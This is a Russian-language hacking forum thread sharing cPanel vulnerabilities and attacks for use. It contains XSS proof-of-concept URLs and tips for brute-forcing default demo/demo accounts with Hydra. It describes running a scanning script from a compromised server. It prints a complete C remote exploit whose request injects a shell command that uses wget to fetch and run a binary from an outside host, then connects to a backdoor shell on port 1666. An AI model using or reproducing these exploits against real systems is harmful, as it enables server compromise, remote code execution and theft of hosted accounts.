• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: cPanel

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Баг в cPanel 10.4.0-EDGE 254 и более ранних версиях
http://news.xss.pro/cpanel.gif
Уязвимость от 11 августа, 2005.

Уязвимость позволяет удаленному авторизованному пользователю получить доступ к другим учетным записям на системе.

Уязвимость существует из-за ошибки в механизме проверки подлинности пользователя. Аутентифицированный администратор (ресселер) может создать новую учетную запись с паролем, идентичным своей учетной записи. Это позволит созданному пользователю получить доступ к управлению другими доменами на системе даже после смены пароля.

Удаленный авторизованный пользователь может получить доступ к управлению доменами, сменив свой пароль на пароль, идентичный паролю администратора.

Конечно для этого нужно знать пароль администратора, но тем не менее. Вообщем прикол в том, что панель проверяет права только по паролю.

:zns5: Видео по взлому

Межсайтовый скриптинг в cPanel 10.2.0-R82 и более ранние версии
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за недостаточной фильтрации входных данных в параметре ‘user’ сценария cpsrvd.pl. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
Код:
http://[host]:2082/login?user=**[code]

:zns2: Производитель
 
Cpanel <=9.* RootShell private exploits + scan
http://news.xss.pro/cpanel.gif
1) Скрипт для удалённого скана сайтов на Cpanel:
Этот скрипт вешаем на удалённый сервер через свой шелл.Главное,чтоб сервер разрешал исходящие соединения.
Рядом кладём список сайтов,которые хотим просканить ,создав файл in.txt.
Пускаем потом скрипт коммандой perl cpanel.pl из под нашего шелла. Если шелл с интерфейсом,то вполне возможно,что придётся после запуска ждать секунд 10 ,а потом остановив загрузку продолжать делать что хотите, а скрипт начнёт работать. В файле out.txt будут складываться результаты скана.
В самом скрипте необходимо указать пути до файлов со списком и результатом.
Код

2) 2 приватных сплоита для Cpanel <=9.* дающие рут-шелл.
Первый сплойт
Второй сплойт
 
Во-первых, про данную дыру я ещё слышал в мая этого года, потом данные сплоиты вышли в PUBLIC в журнале мазафаки от июня.. А то что на дворе версия Cpanel 10... и данный баг пофиксен. :)
 
CPanel Default Password Vulnerability
Вчера на иностранных сайтах появилась инфа следующего содержания:
По дефолту сипанелька имеет демо акки для демонстрации качества услуг хостинга. По умолчанию логин и пароль на демо акк следующие: demo/demo.
В части случаев в демо акках есть Shell-доступ ;)
Панелька юзает порт 2082 по умолчанию. Следовательно, просканировав сервак на порты, по результатам открытого/закрытого порта 2082 можно определить наличие Cpanel с возможным наличием такого акка. Затем можно посканить Хидрой (http://www.thc.org/) или любой другой подобной прогой. Этойже хидрой можно проверить наличие демо-ФТП. ФТП конечно не даст шелл аксцесс, но дает ФТП, а это уже что-то.
Have fun!
Источник: http://skitzu.blogspot.com/
 
Ненаю: старо или нет:

Код:
site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>
site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>
site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx
site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx
site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
 
Межсайтовый скриптинг в cPanel

Программа: cPanel 10.x
Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "numdays" сценария "webmailaging.cgi". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Код:
http://[victim]:2095/webmailaging.cgi?numdays=[code]&ageaction=change
 
Remote Exploit for Cpanel <= 9.x
Код:
/* Remote Exploit for Cpanel <= 9.x, by PakBraiN from WHACKERZ cr3w */
/* op3ns a sh3ll on port 1666 */
/* Gr33tz to WHACKERZ CREW , MianWalian , Apocalypse , ch33ta , Saudia_Hacker , MelHacker , Fady911x , iced_rose , FBH , AIC */
/* any questions or suggestions mailto webmaster@whackers.zzn.com */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 2082

char hack[] = "GET /login/?user=|%22%60cd /opt;wget http://www.spweather.com/whackerz/r0nin;"
              "chmod 777 r0nin;./r0nin%60%22|\r";

int main(int argc, char *argv[]) {

char shell[BUFSIZ];
int sock;
struct sockaddr_in remote;

if(argc != 2) {
printf("\nCPanel <= 9.x Remote Exploit, by PakBraiN\n\n");
printf("Usage: %s <ip>\n\n", argv[0]);
return 0; }

if(argc == 2) {

printf("\nCPanel <= 9.x Remote Exploit, by PakBraiN\n");

remote.sin_family = AF_INET;
remote.sin_port = htons(PORT);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\nERROR: Socket()\n\n");
return -1; }

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) {
printf("\nERROR: Connect()\n\n");
return -1; }

if(send(sock,&hack, sizeof(hack), 0) < 0) {
printf("\nERROR: Send()\n\n");
return -1; }

printf("\nExploit Sent! Closing socket and sleeping for 5 seconds...\n");

close(sock);
sleep(5);

printf("\nDone! Connecting to %s for shell...\n\n", argv[1]);

sprintf(shell, "telnet %s 1666", argv[1]);
system(shell);
printf("\n"); }

return 0; }
 
cPanel - XSS
Дата уязвимости: 2006-06-27
Воздействие: Cross Site Scripting
Software: cPanel 10.x
Решение: Неисправлено
Описание:
Уязвимость позволяет провести XSS атаку.
Пример:
Код:
http://[host]:2082/frontend/x/files/select.html?dir=/&file=
 
cPanel - XSS
Дата уязвимости: 2006-06-27
Воздействие: Cross Site Scripting
Software: cPanel 10.x
Решение: Неисправлено
Описание:
Уязвимость позволяет провести XSS атаку
Не работает.
 
Точнее оно-то работает. Только в рамках прав одного пользователя -)
Не уязвимость а просто разобраны переменные скрипта =)
Может я и ошибаюсь, но на моем серваке работает только в рамках одного пользователя...
 
Уязвимости в cPanel 10.x
Автор: Preth00nker
Суть: Выполнение кросскриптинг атак
Примеры:
http://[host]:2082/frontend/x/htaccess/dohtaccess.html?dir=
Код:
http://[host]:2082/frontend/x/files/editit.html?dir=/&file=[code]
http://[host]:2082/frontend/x/files/showfile.html?dir=/&file=[code]

[quote]Input passed to the "dir" parameter in dohtaccess.html and to the "file" parameter in editit.html and showfile.html is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.[/quote][New$paN]
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх